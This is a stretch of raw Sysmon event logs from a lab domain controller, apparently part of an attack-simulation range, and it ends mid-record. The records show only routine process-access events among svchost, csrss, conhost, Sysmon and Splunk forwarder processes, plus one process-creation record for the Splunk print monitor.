10341000x80000000000000004865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.153{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C7-6064-AA00-00000000AE01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C7-6064-AA00-00000000AE01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.121{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C7-6064-AA00-00000000AE01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.982{266CAFBE-64C7-6064-AA00-00000000AE01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 